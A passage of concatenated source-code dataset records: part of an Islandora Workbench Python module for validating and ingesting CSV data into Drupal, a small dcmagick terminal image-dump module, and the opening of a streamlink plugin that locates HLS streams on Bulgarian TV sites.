else:
return True, None
def validate_single_edtf_date(single_edtf):
if 'T' in single_edtf:
# if re.search(r'^\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d$', single_edtf):
if re.search(r'^\d\d\d\d-\d\d-\d\d(T\d\d:\d\d:\d\d)?$', single_edtf):
return True, None
else:
return False, '"' + single_edtf + '" is an invalid EDTF date and local time value.'
if re.search(r'#|\?|~', single_edtf):
parts = single_edtf.split('-')
if parts[0] is not None and re.search('~|%', parts[0]):
return False, 'Invalid date qualifier in "' + parts[0] + ", must be a ?."
if len(parts) == 2 and re.search(r'\?|%', parts[1]):
return False, 'Invalid date qualifier in "' + parts[1] + ", must be a ~."
if len(parts) == 3 and re.search(r'\?|~', parts[2]):
return False, 'Invalid date qualifier in "' + parts[2] + ", must be a %."
for symbol in '%~?':
single_edtf = single_edtf.replace(symbol, '')
if re.search(r'^\d{4}-?(\d\d)?-?(\d\d)?$', single_edtf):
valid_calendar_date = validate_calendar_date(single_edtf)
if valid_calendar_date is False:
return False, '"' + single_edtf + '" is not a valid calendar date.'
return True, None
else:
return False, single_edtf + " is not a valid EDTF date value."
def validate_calendar_date(date_to_validate):
"""Checks to see if date (yyyy, yyy-mm, or yyyy-mm-dd) is a
valid Gregorian calendar date.
"""
parts = str(date_to_validate).split('-')
if len(parts) == 3:
year = parts[0]
month = parts[1]
day = parts[2]
if len(parts) == 2:
year = parts[0]
month = parts[1]
day = 1
if len(parts) == 1:
year = parts[0]
month = 1
day = 1
try:
datetime.date(int(year), int(month), int(day))
return True
except ValueError:
return False
def validate_url_aliases(config, csv_data):
"""Checks that URL aliases don't already exist.
"""
for count, row in enumerate(csv_data, start=1):
for field_name, field_value in row.items():
if field_name == 'url_alias' and len(field_value) > 0:
if field_value.strip()[0] != '/':
message = 'CSV field "url_alias" in record ' + \
str(count) + ' contains an alias "' + field_value + '" that is missing its leading /.'
logging.error(message)
sys.exit('Error: ' + message)
alias_ping = ping_url_alias(config, field_value)
# @todo: Add 301 and 302 as acceptable status codes?
if alias_ping == 200:
message = 'CSV field "url_alias" in record ' + \
str(count) + ' contains an alias "' + field_value + '" that already exists.'
logging.error(message)
sys.exit('Error: ' + message)
message = 'OK, URL aliases do not already exist.'
print(message)
logging.info(message)
def validate_node_uid(config, csv_data):
"""Checks that the user identified in the 'uid' field exists in Drupal. Note that
this does not validate any permissions the user may have.
"""
for count, row in enumerate(csv_data, start=1):
for field_name, field_value in row.items():
if field_name == 'uid' and len(field_value) > 0:
# Request to /user/x?_format=json goes here; 200 means the user
# exists, 404 means they do no.
uid_url = config['host'] + '/user/' + \
str(field_value) + '?_format=json'
uid_response = issue_request(config, 'GET', uid_url)
if uid_response.status_code == 404:
message = 'CSV field "uid" in record ' + \
str(count) + ' contains a user ID "' + field_value + '" that does not exist in the target Drupal.'
logging.error(message)
sys.exit('Error: ' + message)
message = 'OK, user IDs in the "uid" CSV field all exist.'
print(message)
logging.info(message)
def validate_taxonomy_field_values(config, field_definitions, csv_data):
"""Loop through all fields in field_definitions, and if a field
is a taxonomy reference field, validate all values in the CSV
data in that field against term IDs in the taxonomies referenced
by the field. Does not validate Typed Relation fields
(see validate_typed_relation_field_values()).
"""
# Define a dictionary to store CSV field: term IDs mappings.
fields_with_vocabularies = dict()
vocab_validation_issues = False
# Get all the term IDs for vocabularies referenced in all fields in the CSV.
for column_name in csv_data.fieldnames:
if column_name in field_definitions:
if field_definitions[column_name]['field_type'] == 'typed_relation':
continue
if 'vocabularies' in field_definitions[column_name]:
vocabularies = get_field_vocabularies(config, field_definitions, column_name)
# If there are no vocabularies linked to the current field, 'vocabularies'
# will be False and will throw a TypeError.
try:
num_vocabs = len(vocabularies)
except BaseException:
message = 'Workbench cannot get vocabularies linked to field "' + \
column_name + '". Please confirm that field has at least one vocabulary.'
logging.error(message)
sys.exit('Error: ' + message)
all_tids_for_field = []
for vocabulary in vocabularies:
terms = get_term_pairs(config, vocabulary)
if len(terms) == 0:
if config['allow_adding_terms'] is True:
vocab_validation_issues = True
message = 'Vocabulary "' + vocabulary + '" referenced in CSV field "' + column_name + \
'" may not be enabled in the "Terms in vocabulary" View (please confirm it is) or may contains no terms.'
logging.warning(message)
else:
vocab_validation_issues = True
message = 'Vocabulary "' + vocabulary + '" referenced in CSV field "' + column_name + \
'" may not enabled in the "Terms in vocabulary" View (please confirm it is) or may contains no terms.'
logging.warning(message)
vocab_term_ids = list(terms.keys())
# If more than one vocab in this field, combine their term IDs into a single list.
all_tids_for_field = all_tids_for_field + vocab_term_ids
fields_with_vocabularies.update({column_name: all_tids_for_field})
# If none of the CSV fields are taxonomy reference fields, return.
if len(fields_with_vocabularies) == 0:
return
# Iterate through the CSV and validate each taxonomy fields's values.
new_term_names_in_csv_results = []
for count, row in enumerate(csv_data, start=1):
for column_name in fields_with_vocabularies:
if len(row[column_name]):
new_term_names_in_csv = validate_taxonomy_reference_value(config, field_definitions, fields_with_vocabularies, column_name, row[column_name], count)
new_term_names_in_csv_results.append(new_term_names_in_csv)
if True in new_term_names_in_csv_results and config['allow_adding_terms'] is True:
print("OK, term IDs/names in CSV file exist in their respective taxonomies (and new terms will be created as noted in the Workbench log).")
else:
# All term IDs are in their field's vocabularies.
print("OK, term IDs/names in CSV file exist in their respective taxonomies.")
logging.info("OK, term IDs/names in CSV file exist in their respective taxonomies.")
return vocab_validation_issues
def validate_typed_relation_field_values(config, field_definitions, csv_data):
"""Validate values in fields that are of type 'typed_relation'. Each CSV
value must have this pattern: "string:string:int" or "string:string:string".
If the last segment is a string, it must be term name, a namespaced term name,
or an http URI.
"""
# Define a dictionary to store CSV field: term IDs mappings.
fields_with_vocabularies = dict()
# Get all the term IDs for vocabularies referenced in all fields in the CSV.
vocab_validation_issues = False
for column_name in csv_data.fieldnames:
if column_name in field_definitions:
if 'vocabularies' in field_definitions[column_name]:
vocabularies = get_field_vocabularies(config, field_definitions, column_name)
# If there are no vocabularies linked to the current field, 'vocabularies'
# will be False and will throw a TypeError.
try:
num_vocabs = len(vocabularies)
except BaseException:
message = 'Workbench cannot get vocabularies linked to field "' + \
column_name + '". Please confirm that field has at least one vocabulary.'
logging.error(message)
sys.exit('Error: ' + message)
all_tids_for_field = []
for vocabulary in vocabularies:
terms = get_term_pairs(config, vocabulary)
if len(terms) == 0:
if config['allow_adding_terms'] is True:
vocab_validation_issues = True
message = 'Vocabulary "' + vocabulary + '" referenced in CSV field "' + column_name + \
'" may not be enabled in the "Terms in vocabulary" View (please confirm it is) or may contains no terms.'
logging.warning(message)
else:
vocab_validation_issues = True
message = 'Vocabulary "' + vocabulary + '" referenced in CSV field "' + column_name + \
'" may not enabled in the "Terms in vocabulary" View (please confirm it is) or may contains no terms.'
logging.warning(message)
vocab_term_ids = list(terms.keys())
# If more than one vocab in this field, combine their term IDs into a single list.
all_tids_for_field = all_tids_for_field + vocab_term_ids
fields_with_vocabularies.update({column_name: all_tids_for_field})
# If none of the CSV fields are taxonomy reference fields, return.
if len(fields_with_vocabularies) == 0:
return
typed_relation_fields_present = False
new_term_names_in_csv_results = []
for count, row in enumerate(csv_data, start=1):
for field_name in field_definitions.keys():
if field_definitions[field_name]['field_type'] == 'typed_relation' and 'typed_relations' in field_definitions[field_name]:
if field_name in row:
typed_relation_fields_present = True
delimited_field_values = row[field_name].split(config['subdelimiter'])
for field_value in delimited_field_values:
if len(field_value) == 0:
continue
# First check the required patterns.
if not re.match("^[a-zA-Z]+:[a-zA-Z]+:.+$", field_value.strip()):
message = 'Value in field "' + field_name + '" in row ' + str(count) + \
' (' + field_value + ') does not use the pattern required for typed relation fields.'
logging.error(message)
sys.exit('Error: ' + message)
# Then, check to see if the relator string (the first two parts of the
# value) exist in the field_definitions[fieldname]['typed_relations'] list.
typed_relation_value_parts = field_value.split(':', 2)
relator_string = typed_relation_value_parts[0] + ':' + typed_relation_value_parts[1]
if relator_string not in field_definitions[field_name]['typed_relations']:
message = 'Value in field "' + field_name + '" in row ' + str(count) + \
' contains a relator (' + relator_string + ') that is not configured for that field.'
logging.error(message)
sys.exit('Error: ' + message)
# Iterate through the CSV and validate the taxonomy term/name/URI in each field subvalue.
for column_name in fields_with_vocabularies:
if len(row[column_name]):
delimited_field_values = row[column_name].split(config['subdelimiter'])
delimited_field_values_without_relator_strings = []
for field_value in delimited_field_values:
# Strip the relator string out from field_value, leaving the vocabulary ID and term ID/name/URI.
term_to_check = re.sub('^[a-zA-Z]+:[a-zA-Z]+:', '', field_value)
delimited_field_values_without_relator_strings.append(term_to_check)
field_value_to_check = config['subdelimiter'].join(delimited_field_values_without_relator_strings)
new_term_names_in_csv = validate_taxonomy_reference_value(config, field_definitions, fields_with_vocabularies, column_name, field_value_to_check, count)
new_term_names_in_csv_results.append(new_term_names_in_csv)
if typed_relation_fields_present is True and True in new_term_names_in_csv_results and config['allow_adding_terms'] is True:
print("OK, term IDs/names used in typed relation fields in the CSV file exist in their respective taxonomies (and new terms will be created as noted in the Workbench log).")
else:
if typed_relation_fields_present is True:
# All term IDs are in their field's vocabularies.
print("OK, term IDs/names used in typed relation fields in the CSV file exist in their respective taxonomies.")
logging.info("OK, term IDs/names used in typed relation fields in the CSV file exist in their respective taxonomies.")
return vocab_validation_issues
def validate_taxonomy_reference_value(config, field_definitions, fields_with_vocabularies, csv_field_name, csv_field_value, record_number):
this_fields_vocabularies = get_field_vocabularies(config, field_definitions, csv_field_name)
this_fields_vocabularies_string = ', '.join(this_fields_vocabularies)
new_term_names_in_csv = False
# Allow for multiple values in one field.
terms_to_check = csv_field_value.split(config['subdelimiter'])
for field_value in terms_to_check:
# If this is a multi-taxonomy field, all term names must be namespaced
# using the vocab_id:term_name pattern, regardless of whether
# config['allow_adding_terms'] is True.
if len(this_fields_vocabularies) > 1 and value_is_numeric(field_value) is not True and not field_value.startswith('http'):
# URIs are unique so don't need namespacing.
split_field_values = field_value.split(config['subdelimiter'])
for split_field_value in split_field_values:
namespaced = re.search(':', field_value)
if namespaced:
# If the : is present, validate that the namespace is one of
# the vocabulary IDs referenced by this field.
field_value_parts = field_value.split(':')
if field_value_parts[0] not in this_fields_vocabularies:
message = 'Vocabulary ID ' + field_value_parts[0] + \
' used in CSV column "' + csv_field_name + '", row ' + str(record_number) + \
' does not match any of the vocabularies referenced by the' + \
' corresponding Drupal field (' + this_fields_vocabularies_string + ').'
logging.error(message)
sys.exit('Error: ' + message)
else:
message = 'Term names in multi-vocabulary CSV field "' + \
csv_field_name + '" require a vocabulary namespace; value '
message_2 = '"' + field_value + '" in row ' \
+ str(record_number) + ' does not have one.'
logging.error(message + message_2)
sys.exit('Error: ' + message + message_2)
validate_term_name_length(split_field_value, str(record_number), csv_field_name)
# Check to see if field_value is a member of the field's vocabularies. First,
# check whether field_value is a term ID.
if value_is_numeric(field_value):
field_value = field_value.strip()
if int(field_value) not in fields_with_vocabularies[csv_field_name]:
message = 'CSV field "' + csv_field_name + '" in row ' + \
str(record_number) + ' contains a term ID (' + field_value + ') that is '
if len(this_fields_vocabularies) > 1:
message_2 = 'not in one of the referenced vocabularies (' \
+ this_fields_vocabularies_string + ').'
else:
message_2 = 'not in the referenced vocabulary ("' + \
this_fields_vocabularies[0] + '").'
logging.error(message + message_2)
sys.exit('Error: ' + message + message_2)
# Then check values that are URIs.
elif field_value.startswith('http'):
tid_from_uri = get_term_id_from_uri(config, field_value)
if value_is_numeric(tid_from_uri):
if tid_from_uri not in fields_with_vocabularies[csv_field_name]:
message = 'CSV field "' + csv_field_name + '" in row ' + \
str(record_number) + ' contains a term URI (' + field_value + ') that is '
if len(this_fields_vocabularies) > 1:
message_2 = 'not in one of the referenced vocabularies (' \
+ this_fields_vocabularies_string + ').'
else:
message_2 = 'not in the referenced vocabulary ("' \
+ this_fields_vocabularies[0] + '").'
logging.error(message + message_2)
sys.exit('Error: ' + message + message_2)
else:
message = 'Term URI "' + field_value + '" used in CSV column "' + \
csv_field_name + '"" row ' + str(record_number) + ' does not match any terms.'
logging.error(message)
sys.exit('Error: ' + message)
# Finally, check values that are string term names.
else:
new_terms_to_add = []
for vocabulary in this_fields_vocabularies:
tid = find_term_in_vocab(config, vocabulary, field_value)
if value_is_numeric(tid) is not True:
# Single taxonomy fields.
if len(this_fields_vocabularies) == 1:
if config['allow_adding_terms'] is True:
# Warn if namespaced term name is not in specified vocab.
if tid is False:
new_term_names_in_csv = True
validate_term_name_length(field_value, str(record_number), csv_field_name)
message = 'CSV field "' + csv_field_name + '" in row ' + \
str(record_number) + ' contains a term ("' + field_value.strip() + '") that is '
message_2 = 'not in the referenced vocabulary ("' \
+ this_fields_vocabularies[0] + '"). That term will be created.'
logging.warning(message + message_2)
else:
new_term_names_in_csv = True
message = 'CSV field "' + csv_field_name + '" in row ' + \
str(record_number) + ' contains a term ("' + field_value.strip() + '") that is '
message_2 = 'not in the referenced vocabulary ("' + this_fields_vocabularies[0] + '").'
logging.error(message + message_2)
sys.exit('Error: ' + message + message_2)
# If this is a multi-taxonomy field, all term names must be namespaced using
# the vocab_id:term_name pattern, regardless of whether
# config['allow_adding_terms'] is True.
if len(this_fields_vocabularies) > 1:
split_field_values = field_value.split(config['subdelimiter'])
for split_field_value in split_field_values:
# Check to see if the namespaced vocab is referenced by this field.
[namespace_vocab_id, namespaced_term_name] = split_field_value.split(':', 1)
if namespace_vocab_id not in this_fields_vocabularies:
message = 'CSV field "' + csv_field_name + '" in row ' \
+ str(record_number) + ' contains a namespaced term name '
message_2 = '(' + namespaced_term_name.strip(
) + '") that specifies a vocabulary not associated with that field.'
logging.error(message + message_2)
sys.exit('Error: ' + message + message_2)
tid = find_term_in_vocab(config, namespace_vocab_id, namespaced_term_name)
# Warn if namespaced term name is not in specified vocab.
if config['allow_adding_terms'] is True:
if tid is False and split_field_value not in new_terms_to_add:
new_term_names_in_csv = True
message = 'CSV field "' + csv_field_name + '" in row ' + \
str(record_number) + ' contains a term ("' + namespaced_term_name.strip() + '") that is '
message_2 = 'not in the referenced vocabulary ("' \
+ namespace_vocab_id + '"). That term will be created.'
logging.warning(message + message_2)
new_terms_to_add.append(split_field_value)
validate_term_name_length(split_field_value, str(record_number), csv_field_name)
# Die if namespaced term name is not specified vocab.
else:
if tid is False:
message = 'CSV field "' + csv_field_name + '" in row ' + \
str(record_number) + ' contains a term ("' + namespaced_term_name.strip() + '") that is '
message_2 = 'not in the referenced vocabulary ("' \
+ namespace_vocab_id + '").'
logging.warning(message + message_2)
sys.exit('Error: ' + message + message_2)
return new_term_names_in_csv
def write_to_output_csv(config, id, node_json):
"""Appends a row to the CVS file located at config['output_csv'].
"""
if config['task'] == 'create_from_files':
config['id_field'] = 'ID'
node_dict = json.loads(node_json)
node_field_names = list(node_dict.keys())
node_field_names.insert(0, 'node_id')
node_field_names.insert(0, config['id_field'])
# Don't include these Drupal fields in our output.
fields_to_remove = [
'nid',
'vid',
'created',
'changed',
'langcode',
'default_langcode',
'uid',
'type',
'revision_timestamp',
'revision_translation_affected',
'revision_uid',
'revision_log',
'content_translation_source',
'content_translation_outdated']
for field_to_remove in fields_to_remove:
node_field_names.remove(field_to_remove)
csvfile = open(config['output_csv'], 'a+')
writer = csv.DictWriter(csvfile, fieldnames=node_field_names, lineterminator="\n")
# Check for presence of header row, don't add it if it's already there.
with open(config['output_csv']) as f:
first_line = f.readline()
if not first_line.startswith(config['id_field']):
writer.writeheader()
# Assemble the CSV record to write.
row = dict()
row[config['id_field']] = id
row['node_id'] = node_dict['nid'][0]['value']
row['uuid'] = node_dict['uuid'][0]['value']
row['title'] = node_dict['title'][0]['value']
row['status'] = node_dict['status'][0]['value']
writer.writerow(row)
csvfile.close()
def create_children_from_directory(config, parent_csv_record, parent_node_id, parent_title):
# These objects will have a title (derived from filename), an ID based on the parent's
# id, and a config-defined Islandora model. Content type and status are inherited
# as is from parent. The weight assigned to the page is the last segment in the filename,
# split from the rest of the filename using the character defined in the
# 'paged_content_sequence_seprator' config option.
parent_id = parent_csv_record[config['id_field']]
page_dir_path = os.path.join(config['input_dir'], parent_id)
page_files = os.listdir(page_dir_path)
page_file_return_dict = dict()
for page_file_name in page_files:
filename_without_extension = os.path.splitext(page_file_name)[0]
filename_segments = filename_without_extension.split(
config['paged_content_sequence_seprator'])
weight = filename_segments[-1]
weight = weight.lstrip("0")
# @todo: come up with a templated way to generate the page_identifier,
# and what field to POST it to.
page_identifier = parent_id + '_' + filename_without_extension
page_title = parent_title + ', page ' + weight
# @todo: provide a config option for page content type.
node_json = {
'type': [
{'target_id': config['paged_content_page_content_type'],
'target_type': 'node_type'}
],
'title': [
{'value': page_title}
],
'status': [
{'value': config['published']}
],
'field_model': [
{'target_id': config['paged_content_page_model_tid'],
'target_type': 'taxonomy_term'}
],
'field_member_of': [
{'target_id': parent_node_id,
'target_type': 'node'}
],
'field_weight': [
{'value': weight}
]
}
if 'field_display_hints' in parent_csv_record:
node_json['field_display_hints'] = [{'target_id': parent_csv_record['field_display_hints'], 'target_type': 'taxonomy_term'}]
# Some optional base fields, inherited from the parent object.
if 'uid' in parent_csv_record:
if len(parent_csv_record['uid']) > 0:
node_json['uid'] = [{'target_id': parent_csv_record['uid']}]
if 'created' in parent_csv_record:
if len(parent_csv_record['created']) > 0:
node_json['created'] = [
{'value': parent_csv_record['created']}]
node_headers = {
'Content-Type': 'application/json'
}
node_endpoint = '/node?_format=json'
node_response = issue_request(
config,
'POST',
node_endpoint,
node_headers,
node_json,
None)
if node_response.status_code == 201:
node_uri = node_response.headers['location']
print('+ Node for child "' + page_title + '" created at ' + node_uri + '.')
logging.info('Node for child "%s" created at %s.', page_title, node_uri)
if 'output_csv' in config.keys():
write_to_output_csv(config, page_identifier, node_response.text)
node_nid = node_uri.rsplit('/', 1)[-1]
write_rollback_node_id(config, node_nid)
page_file_path = os.path.join(parent_id, page_file_name)
fake_csv_record = collections.OrderedDict()
fake_csv_record['title'] = page_title
media_response_status_code = create_media(config, page_file_path, node_uri, fake_csv_record)
allowed_media_response_codes = [201, 204]
if media_response_status_code in allowed_media_response_codes:
logging.info("Media for %s created.", page_file_path)
else:
logging.warning('Node for page "%s" not created, HTTP response code was %s.', page_identifier, node_response.status_code)
def write_rollback_config(config):
path_to_rollback_config_file = os.path.join('rollback.yml')
rollback_config_file = open(path_to_rollback_config_file, "w")
yaml.dump(
{'task': 'delete',
'host': config['host'],
'username': config['username'],
'password': config['password'],
'input_dir': config['input_dir'],
'input_csv': 'rollback.csv'},
rollback_config_file)
def prep_rollback_csv(config):
path_to_rollback_csv_file = os.path.join(
config['input_dir'], 'rollback.csv')
if os.path.exists(path_to_rollback_csv_file):
os.remove(path_to_rollback_csv_file)
rollback_csv_file = open(path_to_rollback_csv_file, "a+")
rollback_csv_file.write("node_id" + "\n")
rollback_csv_file.close()
def write_rollback_node_id(config, node_id):
path_to_rollback_csv_file = os.path.join(
config['input_dir'], 'rollback.csv')
rollback_csv_file = open(path_to_rollback_csv_file, "a+")
rollback_csv_file.write(node_id + "\n")
rollback_csv_file.close()
def get_csv_from_google_sheet(config):
url_parts = config['input_csv'].split('/')
url_parts[6] = 'export?gid=' + str(config['google_sheets_gid']) + '&format=csv'
csv_url = '/'.join(url_parts)
response = requests.get(url=csv_url, allow_redirects=True)
if response.status_code == 404:
message = 'Workbench cannot find the Google spreadsheet at ' + config['input_csv'] + '. Please check the URL.'
logging.error(message)
sys.exit('Error: ' + message)
# Sheets that aren't publicly readable return a 302 and then a 200 with a bunch of HTML for humans to look at.
if response.content.strip().startswith(b'<!DOCTYPE'):
message = 'The Google spreadsheet at ' + config['input_csv'] + ' is not accessible.\nPlease check its "Share" settings.'
logging.error(message)
sys.exit('Error: ' + message)
input_csv_path = os.path.join(config['input_dir'], config['google_sheets_csv_filename'])
open(input_csv_path, 'wb+').write(response.content)
def get_csv_from_excel(config):
"""Read the input Excel 2010 (or later) file and write it out as CSV.
"""
if os.path.isabs(config['input_csv']):
input_excel_path = config['input_csv']
else:
input_excel_path = os.path.join(config['input_dir'], config['input_csv'])
if not os.path.exists(input_excel_path):
message = 'Error: Excel file ' + input_excel_path + ' not found.'
logging.error(message)
sys.exit(message)
excel_file_path = config['input_csv']
wb = openpyxl.load_workbook(filename=input_excel_path)
ws = wb[config['excel_worksheet']]
headers = []
header_row = ws[1]
ws.delete_rows(0)
for header_cell in header_row:
headers.append(header_cell.value)
records = []
for row in ws:
record = {}
for x in range(len(header_row)):
if headers[x] is not None and row[x] is not None:
record[headers[x]] = row[x].value
records.append(record)
input_csv_path = os.path.join(config['input_dir'], config['excel_csv_filename'])
csv_writer_file_handle = open(input_csv_path, 'w+', newline='')
csv_writer = csv.DictWriter(csv_writer_file_handle, fieldnames=headers)
csv_writer.writeheader()
for record in records:
if (config['id_field'] in record or 'node_id' in record) and record[config['id_field']] is not None:
csv_writer.writerow(record)
csv_writer_file_handle.close()
def download_remote_file(config, url, node_csv_row):
sections = urllib.parse.urlparse(url)
try:
response = requests.get(url, allow_redirects=True)
except requests.exceptions.Timeout as err_timeout:
message = 'Workbench timed out trying to reach ' + \
sections.netloc + ' while connecting to ' + url + '. Please verify that URL and check your network connection.'
logging.error(message)
logging.error(err_timeout)
print('Error: ' + message)
except requests.exceptions.ConnectionError as error_connection:
message = 'Workbench cannot connect to ' + \
sections.netloc + ' while connecting to ' + url + '. Please verify that URL and check your network connection.'
logging.error(message)
logging.error(error_connection)
print('Error: ' + message)
# create_media() references the path of the downloaded file.
subdir = os.path.join(config['input_dir'], re.sub('[^A-Za-z0-9]+', '_', node_csv_row[config['id_field']]))
Path(subdir).mkdir(parents=True, exist_ok=True)
if config["use_node_title_for_media"]:
filename = re.sub('[^A-Za-z0-9]+', '_', node_csv_row['title'])
if filename[-1] == '_':
filename = filename[:-1]
downloaded_file_path = os.path.join(subdir, filename)
file_extension = os.path.splitext(downloaded_file_path)[1]
else:
downloaded_file_path = os.path.join(subdir, url.split("/")[-1])
file_extension = os.path.splitext(url)[1]
f = open(downloaded_file_path, 'wb+')
f.write(response.content)
f.close
mime = magic.from_file(downloaded_file_path, mime=True)
ext = mimetypes.guess_extension(mime)
if ext == '.jpe':
ext = '.jpg'
if file_extension == '':
os.rename(downloaded_file_path, downloaded_file_path + ext)
downloaded_file_path = downloaded_file_path + ext
return downloaded_file_path
def get_csv_template(config, args):
field_definitions = get_field_definitions(config)
field_labels = collections.OrderedDict()
field_labels['REMOVE THIS COLUMN (KEEP THIS ROW)'] = 'LABEL (REMOVE THIS ROW)'
for field_name in field_definitions:
if field_definitions[field_name]['label'] != '':
field_labels[field_name] = field_definitions[field_name]['label']
else:
field_labels[field_name] = ''
required = collections.OrderedDict()
required['REMOVE THIS COLUMN (KEEP THIS ROW)'] = 'REQUIRED IN CREATE TASKS (REMOVE THIS ROW)'
for field_name in field_definitions:
if field_definitions[field_name]['required'] != '':
if field_definitions[field_name]['required'] is True:
required[field_name] = 'Yes'
else:
required[field_name] = 'No'
required['title'] = 'Yes'
required['uid'] = 'No'
required['langcode'] = 'No'
required['created'] = 'No'
required[config['id_field']] = 'Yes'
if config['nodes_only'] is True:
required['file'] = 'Yes'
else:
required['file'] = 'No'
mapping = dict()
mapping['string'] = 'Free text'
mapping['string_long'] = 'Free text'
mapping['text'] = 'Free text'
mapping['text_long'] = 'Free text'
mapping['geolocation'] = '+49.16,-123.93'
mapping['entity_reference'] = '100 [or term name or http://foo.com/someuri]'
mapping['edtf'] = '2020-10-28'
mapping['typed_relation'] = 'relators:art:30'
mapping['integer'] = 100
sample_data = collections.OrderedDict()
sample_data['REMOVE THIS COLUMN (KEEP THIS ROW)'] = 'SAMPLE DATA (REMOVE THIS ROW)'
sample_data[config['id_field']] = '0001'
sample_data['file'] = 'myimage.jpg'
sample_data['uid'] = '21'
sample_data['langcode'] = 'fr'
sample_data['created'] = '2020-11-15T23:49:22+00:00'
sample_data['title'] = 'Free text'
for field_name in field_definitions:
if field_definitions[field_name]['field_type'] in mapping:
sample_data[field_name] = mapping[field_definitions[field_name]['field_type']]
else:
sample_data[field_name] = ''
csv_file_path = os.path.join(config['input_dir'], config['input_csv'] + '.csv_file_template')
csv_file = open(csv_file_path, 'a+')
writer = csv.DictWriter(csv_file, fieldnames=sample_data.keys(), lineterminator="\n")
writer.writeheader()
# We want the labels and required rows to appear as the second and third rows so
# add them before we add the sample data.
writer.writerow(field_labels)
writer.writerow(required)
writer.writerow(sample_data)
cardinality = collections.OrderedDict()
cardinality['REMOVE THIS COLUMN (KEEP THIS ROW)'] = 'NUMBER OF VALUES ALLOWED (REMOVE THIS ROW)'
cardinality[config['id_field']] = '1'
cardinality['file'] = '1'
cardinality['uid'] = '1'
cardinality['langcode'] = '1'
cardinality['created'] = '1'
cardinality['title'] = '1'
for field_name in field_definitions:
if field_definitions[field_name]['cardinality'] == -1:
cardinality[field_name] = 'unlimited'
else:
cardinality[field_name] = field_definitions[field_name]['cardinality']
writer.writerow(cardinality)
docs = dict()
docs['string'] = 'Single-valued fields'
docs['string_long'] = 'Single-valued fields'
docs['text'] = 'Single-valued fields'
docs['text_long'] = 'Single-valued fields'
docs['geolocation'] = 'Geolocation fields'
docs['entity_reference'] = 'Taxonomy reference fields'
docs['edtf'] = 'EDTF fields'
docs['typed_relation'] = 'Typed Relation fields'
docs['integer'] = 'Single-valued fields'
docs_tips = collections.OrderedDict()
docs_tips['REMOVE THIS COLUMN (KEEP THIS ROW)'] = 'SECTION IN DOCUMENTATION (REMOVE THIS ROW)'
docs_tips[config['id_field']] = 'Required fields'
docs_tips['file'] = 'Required fields'
docs_tips['uid'] = 'Base fields'
docs_tips['langcode'] = 'Base fields'
docs_tips['created'] = 'Base fields'
docs_tips['title'] = 'Base fields'
for field_name in field_definitions:
if field_definitions[field_name]['field_type'] in docs:
doc_reference = docs[field_definitions[field_name]['field_type']]
docs_tips[field_name] = doc_reference
else:
docs_tips[field_name] = ''
docs_tips['field_member_of'] = ''
writer.writerow(docs_tips)
csv_file.close()
print('CSV template saved at ' + csv_file_path + '.')
sys.exit()
def get_percentage(part, whole):
return 100 * float(part) / float(whole)
| 46.033119
| 181
| 0.602179
|
794afd12abf4f7a2582e47379c1258a41a0f9429
| 418
|
py
|
Python
|
src/dcmagick/dump/terminal.py
|
ar90n/dcmagick
|
c6816c7cb415da627992da871c8c5b7cfd8b7e93
|
[
"MIT"
] | 1
|
2020-09-29T15:11:25.000Z
|
2020-09-29T15:11:25.000Z
|
src/dcmagick/dump/terminal.py
|
ar90n/dcmagick
|
c6816c7cb415da627992da871c8c5b7cfd8b7e93
|
[
"MIT"
] | 2
|
2020-02-06T20:00:13.000Z
|
2020-02-11T17:58:14.000Z
|
src/dcmagick/dump/terminal.py
|
ar90n/dcmagick
|
c6816c7cb415da627992da871c8c5b7cfd8b7e93
|
[
"MIT"
] | null | null | null |
import numpy as np
from teimpy import Mode, get_drawer
from ..common.window import apply as apply_window
def _dump(mode, proxy):
drawer = get_drawer(mode)
return drawer.draw(apply_window(proxy))
def dump_braille(proxy):
return _dump(Mode.BRAILLE, proxy)
def dump_halfblock(proxy):
return _dump(Mode.HALF_BLOCK, proxy)
def dump_iterm2(proxy):
return _dump(Mode.ITERM2_INLINE_IMAGE, proxy)
| 18.173913
| 49
| 0.748804
|
794afd26ae5284adb569d6b3bc0b5f48116df809
| 2,439
|
py
|
Python
|
src/streamlink/plugins/cdnbg.py
|
eleeeeeee/abc
|
5d81d68c7a47e931f050632ae7cddb3b044971b4
|
[
"BSD-2-Clause"
] | 1
|
2019-11-25T01:37:21.000Z
|
2019-11-25T01:37:21.000Z
|
src/streamlink/plugins/cdnbg.py
|
eleeeeeee/abc
|
5d81d68c7a47e931f050632ae7cddb3b044971b4
|
[
"BSD-2-Clause"
] | 3
|
2018-06-22T23:33:46.000Z
|
2018-06-25T00:14:35.000Z
|
src/streamlink/plugins/cdnbg.py
|
eleeeeeee/abc
|
5d81d68c7a47e931f050632ae7cddb3b044971b4
|
[
"BSD-2-Clause"
] | 1
|
2020-08-12T08:27:22.000Z
|
2020-08-12T08:27:22.000Z
|
from __future__ import print_function
import re
from streamlink.compat import urlparse
from streamlink.plugin import Plugin
from streamlink.plugin.api import http
from streamlink.plugin.api import useragents
from streamlink.plugin.api import validate
from streamlink.stream import HLSStream
from streamlink.utils import update_scheme
class CDNBG(Plugin):
url_re = re.compile(r"""
https?://(?:www\.)?(?:
tv\.bnt\.bg/\w+(?:/\w+)?|
bitelevision\.com/live|
nova\.bg/live|
kanal3\.bg/live|
bgonair\.bg/tvonline|
tvevropa\.com/na-zhivo|
bloombergtv.bg/video
)/?
""", re.VERBOSE)
iframe_re = re.compile(r"iframe .*?src=\"((?:https?:)?//(?:\w+\.)?cdn.bg/live[^\"]+)\"", re.DOTALL)
sdata_re = re.compile(r"sdata\.src.*?=.*?(?P<q>[\"'])(?P<url>http.*?)(?P=q)")
hls_file_re = re.compile(r"(src|file): (?P<q>[\"'])(?P<url>(https?:)?//.+?m3u8.*?)(?P=q)")
hls_src_re = re.compile(r"video src=(?P<url>http[^ ]+m3u8[^ ]*)")
stream_schema = validate.Schema(
validate.any(
validate.all(validate.transform(sdata_re.search), validate.get("url")),
validate.all(validate.transform(hls_file_re.search), validate.get("url")),
validate.all(validate.transform(hls_src_re.search), validate.get("url")),
)
)
@classmethod
def can_handle_url(cls, url):
return cls.url_re.match(url) is not None
def find_iframe(self, res):
p = urlparse(self.url)
for url in self.iframe_re.findall(res.text):
if "googletagmanager" not in url:
if url.startswith("//"):
return "{0}:{1}".format(p.scheme, url)
else:
return url
def _get_streams(self):
http.headers = {"User-Agent": useragents.CHROME}
res = http.get(self.url)
iframe_url = self.find_iframe(res)
if iframe_url:
self.logger.debug("Found iframe: {0}", iframe_url)
res = http.get(iframe_url, headers={"Referer": self.url})
